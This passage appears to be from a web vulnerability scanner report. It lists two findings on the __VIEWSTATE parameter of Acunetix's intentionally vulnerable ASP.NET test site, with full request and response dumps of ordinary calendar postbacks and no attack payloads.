visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8267&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA3%2Bw%2BgtoIZGRkbUXgxC6numsOETD%2BWeRFxxd77po%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLe8Z2kDAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DS62oO1HDJCvsYYFTGh0gwIxby%2BM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:21 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA3+w+gtoIZGRkbUXgxC6numsOETD+WeRFxxd77po=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLe8Z2kDAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DS62oO1HDJCvsYYFTGh0gwIxby+M=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:White" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8255&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA6u%2FQeNoIZGRkDdSTYHY5GiTJRpSFaDM8iCnzMl0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKE%2Fpi7DQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DVtBFQyOezFEVfX0cU4WmNzW682c%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:26 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA6u/QeNoIZGRkDdSTYHY5GiTJRpSFaDM8iCnzMl0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKE/pi7DQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DVtBFQyOezFEVfX0cU4WmNzW682c=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:White" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows 